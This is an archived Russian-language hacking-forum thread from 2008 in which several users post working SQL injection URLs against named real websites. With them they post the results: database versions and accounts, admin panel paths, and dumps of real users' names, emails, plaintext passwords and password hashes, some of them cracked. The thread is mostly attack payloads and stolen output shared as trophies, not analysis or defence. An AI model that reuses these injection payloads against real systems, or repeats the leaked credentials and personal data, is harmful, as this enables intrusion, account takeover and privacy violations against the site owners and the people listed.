ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.01.2008, 18:20
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
boxing78.ru
Код HTML:
http://www.boxing78.ru/?c=-7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7/*
USER:ProBoxSQL@77.234.201.114
VERSION:4.1.20
DATABASE:ProBoxSQL
mtlaurelbaseball.org
Код HTML:
http://www.mtlaurelbaseball.org/team.php?id=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/*
USER:mtlaurel_1@localhost
VERSION:4.1.22-standard
DATABASE:mtlaurel_1
|
|
|
25.01.2008, 19:10
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
kraspol.ru
http://kraspol.ru/news.php?nid=59000+union+select+1,2,3,4,5,6,7,8/*
http://vesti-ural.ru/news.php?nid=1064999+union+select+1,2,3,4,concat(i d,char(58),name,char(58),email),6,7,8,9,10,11,12,1 3+from+users+limit+5,60/*
version() 4.1.22
user() kraspol@localhost
database() wwwkraspolru
vesti-ural.ru
version() 5.0.33-log
user() siteuser@localhost
database() vesti_ural
путь до скрипта /usr/Internet/WebSRV/news.php, узнал из ошибки мускула.
таблицы
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
apps
comments
fotoimage
fotorep
images
keywords
left_nav_banners
left_nav_panel
menuitems
mitemsect
news
newscomm
newsimag
newskeys
newsrubr
prg_items
prg_weeks
rubrics
sections
showapps
terms
users - колонки id, name, email, пассов не нашел=/
vipusks
w_city
w_day
w_descr
w_ekaburg
w_nebulosity
w_precipitation
w_weather
w_winddir
содержимое users
Код:
вид ID:name:email
1:Денис:MrDekk@sgtrk.ru
2:MrDekk:MrDekk@yandex.ru
3:Имя:E-mail
5:Огнева Татьяна:ota@ekt.usi.ru
6:Достовалова Елена Дмитриевна:femida@uralmail.com
7:заинтересовавшийся:vova26_92@planet-a.ru
8:Сергей Трофимов:strofimov@mail.ru
9:галина:torgova@ru66.ru
10:Света:Svetaxvostik@list.ru
11:Ромбик:Jane-tdk@mail.ru
12:наташа:forest13@ mail.ru
13:Имя Jul:E-mail orlova@di-fence.ru
14:Имя Владимир Александрович:E-mail shva@energops.ru
15:Kotovsk:kotovska@e1.ru
16:Ирина Сингх:irinasingh@mail.ru
17:Сергей:Over4@mail.ru
18:Анна:salymskaya@zhizn.e-burg.ru
19:Андрей:brabus45@yandex.ru
20:Алексей:Аleks@.ru
21:Prorok:Drug1drug@rambler.ru
22:Дина:kralka@yandex.ru
23:Имя МаксУля:E-mail podrabinok@bk.ru
24:bdfybwrfz:iot-smi@epn.ru
25:Татьяна:paravinat@mail.ru
26:константин:mushtandroid87mail.ru
27:Dawn:jack@fromru.net
28:Timothy:laura@mail15.com
29:Jody:mike@yahoo.com
30:Александр:sashka3333@rambler.ru
31:Дмитрий:bdv54@olympus.ru
32:Антон:apsplus@mail.ru
33:Марина:Katusha.But@rambler.ru
34:Николай Сызганов:nas@tsgrp.ru
35:Елена:fb69@mail.ru
36:Имя Екатерина:E-mail katrin-l@planet-a.ru
37:Ольга:ned.olga@mail.ru
админка
Код:
http://vesti-ural.ru/admin
лезть туда не пытался
tnuva.ru
http://www.tnuva.ru/recipes.php?rid=69699+union+select+1,2,3,4,5,6/*
B]version()[/B] 5.0.45-community-log
user() optionsw_ru01@localhost
database() optionsw_ru01
колонки в users
Код:
online
votes
addr
created
city
email
phone
thumb
filename
lastname
firstname
uid
stjag.ru
"+" фильтруется, поэтому я использую "/**/"
Код:
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,666,7,8,9,10,11,12,13,14/*
смотрим результат в <title></title>
Код:
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,concat(version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14/*
version() 4.1.22 
user() dbu_ansimov_1@localhost
database() db_ansimov_6
|
|
|
|
25.01.2008, 19:26
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Код:
http://ukrfoto.dp.ua/download.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a%20%20,database()),3,4,5,6/*
4.1.22-log:ukrfoto@saturn:ukrfoto |
|
|
|
25.01.2008, 19:27
|
|
Новичок
Регистрация: 23.01.2008
Сообщений: 15
Провел на форуме:
20588
Репутация:
63
|
|
www.cri-service.nl
http://www.cri-service.nl/Cv.php?id=-5+union+select+1,convert(concat_ws(0x3A3a,version( ),database(),user())+using+latin1),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35/*
4.1.11-standard::cri_cvcri::cri_cri@localhost
Таблицы не искал, может кому будет интересно.  |
|
|
|
25.01.2008, 19:28
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://boardpros.net/index.php?menu=forum_catview&catid=9999+union+select+1,2,3,4,5,concat_ws(0x3a,username,upass,uemail),7+from+users/*
Код:
lepunk:fuckyou:meraj51@gmail.com
poster:runescape:mickyman_1@hotmail.com
owner:owner:gohkaiwei@gmail.com
nyunyu:74225:admin@hotfreesms.net
default:degauss:default_logon@yahoo.com
davino:4730410672:kritano@gmail.com
surfville:surfy231:surfville@gmail.com
kittie:20052005:yaseminkaradut@hotmail.com
bandaloon:sponge:darthwrathchild@seattle-mariners.net
darth wrathchild:sponge:bandaloon@mailinator.com
WarChiLd3192:123456:w4r_ch1ld@hotmail.com
Janizu99:jjl99:janizu99@hotmail.com
Код HTML:
http://vostokmedia.com/news.details.php?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-standard-log
vostokmedia@localhost
vostokmedia
Код HTML:
http://www.domkino.spb.ru/description.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,password,email,name),11,12+from+user/*
shurik:ahin:sshurik@online.ru:Шурик
4.1.21-log
domkinospbru@78.108.81.211
domkinospbru |
|
|
|
25.01.2008, 21:42
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
www.pcper.com
Код:
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6/*
5.0.22:root@localhost:PCPerspective
Код:
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,userid,username,password),6+from+users/*
userid: username: password
1:Joe White:0ce6f50fd05a98110c2e1627fd98f164: solaris897
3:Ryan:2f86b8b4254dfba8e6e7cd9fdd7a9d46: QHDn47
6:Jon:46d55792707ba7c7883a0afa30127e06: kokoro12
9:Jeremy:124189dac0291419d7d2c875da0e7199
10:unclebob:dea926d0e46968b53dd6d542dc7a129b: butthaid
админка
Код:
http://www.pcper.com/admin/index.php
www.gurufocus.com
Код:
http://www.gurufocus.com/fairvalue.php?user_id=-27097+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4/*
4.1.22-standard:gurufocu_add@localhost:gurufocu_forum
Последний раз редактировалось 5taY3r; 25.01.2008 в 21:44..
|
|
|
|
25.01.2008, 23:41
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://f-forpost.ru/product.asp?id=-1+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
http://f-forpost.ru/product.asp?id=-1+or+1=(select+db_name())--
forpost
http://f-forpost.ru/product.asp?id=-1+or+1=(select+system_user)--
sa
----------------------------------------------------------------------------
http://www.coldplace.ru/textmus.php?cd=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user())/*&song=2&name=&id2=1
4.1.20-lk-log/coldplac/coldplac@localhost
--------------------------------------------------------------------------
aprelevka.ru
http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,cast(ver sion()+as+binary),cast(database()+as+binary),cast( user()+as+binary)),8,9,10/*
4.1.11/aprelevka/root@localhost
http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,pa ssword,email),8,9,10+from+users+limit+0,1/*
логин/хеш/мейл
admin/4f2abf1ca5cfd9d21209d6ee83181f16/shurduk@yandex.ru
|
|
|
|
26.01.2008, 03:10
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://www.bsigroup.ru/outgoing/context.php?id=22&this=9999'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
5.0.22
bsigroup_newwww@localhost
bsigroup_out
таблица _system_user
и логины и пароли хешированы
вот что достал:
login / pass
root / 89905f508ebdc32e7eb0c24fdb118305
c13fdb1b736210f38d0d080fc102d822 / gctdlj
sergey/ 47e35e5e6ab2f91c765b7865399bf8e2
ba839967c5682a7cbe8f865ace327059 / afc60964559e943a8ba803c18f5de457
3e7a517843ed19a2b058bd7ce723fb49 / 862d10398b0bb1653fe239ca4f9a819a |
|
|
|
26.01.2008, 20:04
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
www.maxygen.com
Код:
http://www.maxygen.com/newsview.php?listid=-293+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),user(),database()),20,21,22,23/*
4.1.20:maxadmin_r@72.32.100.240:maxadmin_sqlstar
www.bi-me.com
Код:
http://www.bi-me.com/main.php?id=-16202+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*&t=1&c=33&cg=4
4.1.22-standard:bime_sgadmin@localhost:bime_totalcontent
www.ilika.com
Код:
http://www.ilika.com/main.php?id=-7+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*
4.1.18-standard:ilikaadm_www@localhost:ilikaadm_www
www.swedishclub.com
Код:
http://www.swedishclub.com/main.php?id=-113+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7/*&menuid=52
4.1.18-nt:root@localhost:content
www.igp.pt
Код:
http://www.igp.pt/main.php?Id=-17+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*&Lingua=PT
4.0.14-STANDARD:JAFONSO@OCTOPUS:WOF
|
|
|
|
26.01.2008, 20:09
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.fiveavenue.ru/?pid=-1+union+select+1,2,3,4,login,6,pass,8,9,0+from+adm in/*
4.1.22-log
admin:admin
http://www.fiveavenue.ru/adm - не подходит .. ((
-----------------------------------------------------
oplati.ru
http://www.kapma.ru/index.php?cat=-89+union+select+1,2,3,concat_ws(0x3a,username,user _password),5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users+ limit+1,1/*
http://www.forum.oplati.ru/
Andy:a001e3532291b47293aebefee7616557:vfierr
-----------------------------------------------------
www.norfolkadmirals.com - PR5
http://www.norfolkadmirals.com/release_story1.php?id=-868+union+select+1,2,concat(table_name,0x3a,column _name),4,5,6,7+from+information_schema.columns+lim it+1111,1/*
колонок с пассами и нечем интересным не нащёл ((
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
